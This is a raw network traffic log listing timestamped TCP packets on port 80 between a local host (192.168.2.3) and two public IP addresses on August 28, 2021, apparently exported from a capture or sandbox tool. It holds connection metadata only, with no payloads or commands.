Aug 28, 2021 00:06:50.203039885 CEST	49729	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:50.209423065 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:50.210124016 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:50.210441113 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:50.244579077 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:50.263978004 CEST	80	49728	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:50.270091057 CEST	80	49729	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:50.270241022 CEST	49729	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:50.270347118 CEST	49729	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:50.333318949 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:50.351386070 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:50.367368937 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:50.430088997 CEST	80	49729	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:50.430255890 CEST	49729	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:50.475958109 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:50.476103067 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:50.496754885 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:50.499294996 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:50.571820974 CEST	80	49729	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:50.600523949 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:50.603185892 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:50.628631115 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:50.710783005 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:50.766411066 CEST	80	49729	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:50.833853960 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:50.833964109 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:50.862952948 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:50.866110086 CEST	49729	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:50.888488054 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:50.928591013 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:50.929544926 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:50.956954002 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:50.976437092 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:50.992202997 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:51.101490021 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:51.101648092 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:51.121876001 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:51.123316050 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:51.226030111 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:51.232367992 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:51.252724886 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:51.374411106 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:51.495634079 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:51.496964931 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:51.497100115 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:51.531799078 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:51.538065910 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:51.602119923 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:51.620839119 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:51.648930073 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:51.726586103 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:51.726725101 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:51.778003931 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:51.778115034 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:51.851275921 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:51.896114111 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:51.907433033 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:52.007832050 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:52.122215033 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:52.130486965 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:52.130635977 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:52.175220966 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:52.226829052 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:52.241151094 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:52.253906965 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:52.289153099 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:52.351644993 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:52.351790905 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:52.419991016 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:52.420145035 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:52.476322889 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:52.507414103 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:52.550450087 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:52.617228985 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:52.744066000 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:52.744183064 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:52.744960070 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:52.824470997 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:52.851728916 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:52.867230892 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:52.930071115 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:52.977854013 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:52.978038073 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:53.060241938 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:53.060411930 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:53.102612972 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:53.141108990 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:53.189707041 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:53.241389990 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:53.258271933 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:53.356944084 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:53.381175995 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:53.381258965 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:53.428844929 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:53.456080914 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:53.461172104 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:53.503803015 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:53.538127899 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:53.570446968 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:53.585625887 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:53.585776091 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:53.700551987 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:53.700629950 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:53.710340977 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:53.770543098 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:53.829827070 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:53.882932901 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:53.980892897 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.005963087 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.006160975 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:54.038203955 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:54.086416960 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:54.089286089 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.130254984 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.211816072 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.211940050 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:54.212527990 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:54.336287022 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.341639042 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.341785908 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:54.403101921 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.471076012 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.512284040 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:54.606189966 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.635157108 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.635283947 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:54.711429119 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:54.740906000 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.758193970 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.835855961 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.835971117 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:54.851815939 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:54.960283995 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.981364012 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:54.981511116 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:55.024313927 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:55.110938072 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:55.133301020 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:55.232255936 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:55.257483959 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:55.257618904 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:55.335870981 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:55.378901005 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:55.380270004 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:55.428963900 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:55.460006952 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:55.460196018 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:55.585356951 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:55.658143997 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:55.741493940 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:55.842588902 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:55.929030895 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:57.991239071 CEST	49723	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.011950970 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.072689056 CEST	80	49723	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.089982033 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.090158939 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.090368032 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.090511084 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.157424927 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.157603025 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.157654047 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.157671928 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.157699108 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.157701969 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.157723904 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.157754898 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.157783031 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.157808065 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.158143044 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.158251047 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.158708096 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.158801079 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.159269094 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.159348965 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.160007954 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.160110950 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.260416031 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.260643005 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.331370115 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.569905043 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.637597084 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.637779951 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.759362936 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.759593010 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.869719028 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.869918108 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:58.939521074 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:58.939781904 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.006932974 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.006982088 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.007005930 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.007107973 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.007147074 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.007169008 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.007200003 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.007225037 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.007242918 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.007301092 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.007328033 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.007354021 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.007397890 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.007427931 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.007440090 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.124902010 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.125142097 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.234574080 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.234740973 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.302011013 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.302210093 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.351720095 CEST	49731	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.382323027 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.382456064 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.503285885 CEST	80	49731	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.503473997 CEST	49731	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.503595114 CEST	49731	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.517122030 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.517287970 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.568118095 CEST	80	49731	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.568173885 CEST	80	49731	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.568242073 CEST	49731	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.568391085 CEST	49731	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.569741964 CEST	49732	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.584903002 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.585005999 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.586401939 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.632186890 CEST	80	49731	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.632235050 CEST	80	49731	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.633758068 CEST	80	49732	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.633944988 CEST	49732	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.634000063 CEST	49732	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.659770012 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.659902096 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.659953117 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.660171032 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.660243988 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.698824883 CEST	80	49732	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.698995113 CEST	49732	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.727288961 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.727328062 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.727363110 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.727452040 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.727511883 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.763170004 CEST	80	49732	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.763271093 CEST	80	49732	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.763407946 CEST	80	49732	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.763575077 CEST	49732	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.763632059 CEST	49732	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.764923096 CEST	49733	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.810089111 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.810235977 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.810518026 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.810590982 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.829484940 CEST	80	49732	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.829715967 CEST	80	49733	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.829854965 CEST	49733	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.829972982 CEST	49733	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.887526035 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.887682915 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.888096094 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.888170958 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.888214111 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.894536018 CEST	80	49733	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.894567013 CEST	80	49733	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:59.894705057 CEST	49733	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:59.896892071 CEST	49734	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.140335083 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.140486002 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.142678022 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.144570112 CEST	80	49734	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.144695997 CEST	49734	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.144823074 CEST	49734	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.145848036 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.145931005 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.149579048 CEST	80	49733	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.209925890 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.209961891 CEST	80	49734	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.209978104 CEST	80	49734	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.209990978 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.210036039 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.210064888 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.211740971 CEST	49735	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.212903976 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.213001013 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.320554018 CEST	80	49735	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.320689917 CEST	49735	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.320847034 CEST	49735	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.324435949 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.324476957 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.324573040 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.324615955 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.327826023 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.328000069 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.392553091 CEST	80	49735	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.392662048 CEST	49735	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.393390894 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.393480062 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.393522978 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.393573999 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.395106077 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.395266056 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.459774971 CEST	80	49735	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.471616030 CEST	80	49735	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.471653938 CEST	80	49735	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.471769094 CEST	49735	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.471880913 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.471919060 CEST	49735	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.472006083 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.472054958 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.472076893 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.472143888 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.473412037 CEST	49736	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.627613068 CEST	80	49736	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.627839088 CEST	49736	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.627933025 CEST	49736	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.695194006 CEST	80	49736	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.695230007 CEST	80	49736	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.697118998 CEST	49737	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.806647062 CEST	80	49737	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.808130026 CEST	49737	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.808231115 CEST	49737	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.866972923 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.868016005 CEST	49735	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.877034903 CEST	80	49737	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.877115965 CEST	80	49737	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.878838062 CEST	49738	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.937609911 CEST	49739	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.958321095 CEST	80	49735	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.959698915 CEST	80	49730	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.959862947 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.960064888 CEST	49730	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:00.961785078 CEST	80	49738	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:00.961904049 CEST	49738	80	192.168.2.3	5.254.118.226
